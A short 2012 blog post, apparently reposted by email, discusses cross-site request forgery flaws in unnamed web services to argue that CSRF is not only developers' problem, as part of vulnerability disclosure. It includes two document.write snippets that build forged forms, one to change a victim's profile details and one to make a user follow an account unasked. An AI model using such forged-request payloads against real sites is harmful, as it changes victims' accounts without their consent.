Thursday, April 05, 2012

A few CSRF-like vulnerable examples.

Remark: Post is published on April 2(but was expected yesterday) coz Berlin haz no free wifi cause I'm not joking and I figured out that Sunday is the worst day for urgent updates. Well, who cares the date, enjoy:

I'm trying hard to prove my point that statement "CSRF is only the developers' problem" is not true. I provided some examples and I want you to check them out. I really appreciate any viewpoint at this problem. Thank you for your attention in advance!

Quick overview:

document.write('<form action="" method=post> <input name="name" value="SUUUUP"><input name="fname" value="SUUUUP"><input name="sname" value="SUUUUP"><input name="birth_day" value="28"><input name="birth_month" value="01"><input name="section" value="basic"><input name="birth_year" value="1991"> </form>')

e.g. changing your profile details. No protection at all.

document.write('<form target=ifr name=pwn method=post action=""></form>')

makes you follow certain account without your confirmation. reported few weeks ago and fixed. 

deleting presentation via GET. commenting w/o confirmation. GET following etc

Read more: Egor Homakov
QR: Inline image 1

Posted via email from Jasper-Net